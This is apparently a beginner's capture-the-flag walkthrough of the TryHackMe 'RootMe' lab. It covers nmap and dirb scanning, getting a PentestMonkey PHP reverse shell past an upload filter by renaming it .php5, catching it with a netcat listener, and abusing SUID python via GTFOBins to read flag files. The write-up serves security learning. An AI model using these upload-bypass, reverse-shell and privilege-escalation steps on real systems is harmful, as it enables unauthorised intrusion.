THM — RootMe

Beginner’s CTF on TryHackMe


We first scan the machine to find open ports:

nmap -sV -vv 10.10.x.x

Nmap scan results gives us two ports open. From here we can try to examine the Apache server on port 80.

We can run dirb to try to find directories.

dirb http://10.10.x.x

We find two directories of interest: /panel/ and /uploads/ to explore.

Getting a Shell:

The /panel path allows us to upload files unto the website. We attempt to gain a reverse shell. Uploading a .php extension file results in an error so we try other extensions to see if we can upload our payload.

We utilize a reverse shell payload from PenTest Monkey, and change the paramters to point back to our machine.

$ip = '10.x.x.x';  // CHANGE THIS

When we first attempt to upload the shell we receive an error, we then try changing the extension to .php5 and our file is uploaded successfully. Prior to executing our payload we set up a listener on the 3033 port, which will connect once we run our code. Heading to the /uploads we see our payload is there. Clicking on the payload allows for the code to run and for our listener to connect.

nc -lvnp 3033 
Listening on [] (family 0, port 3033)
Connection from 10.10.x.x 33822 received!
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Once we are connected we can search for our flag and view the contents

find / -name 'user.txt' 2>/dev/null

Privilege Escalation:

Since no password or user was found in the last task, we search for SUID

find / -perm -u=s -type f 2>/dev/null

We find an interesting file at /usr/bin/python. We attempted to do the SUID exploit but it didnt work out so we used the file read to view our file.

Knowing that we can abuse python, we use GTFOBins File Read Python to view our flag

python -c 'print(open("/path/to/file").read())'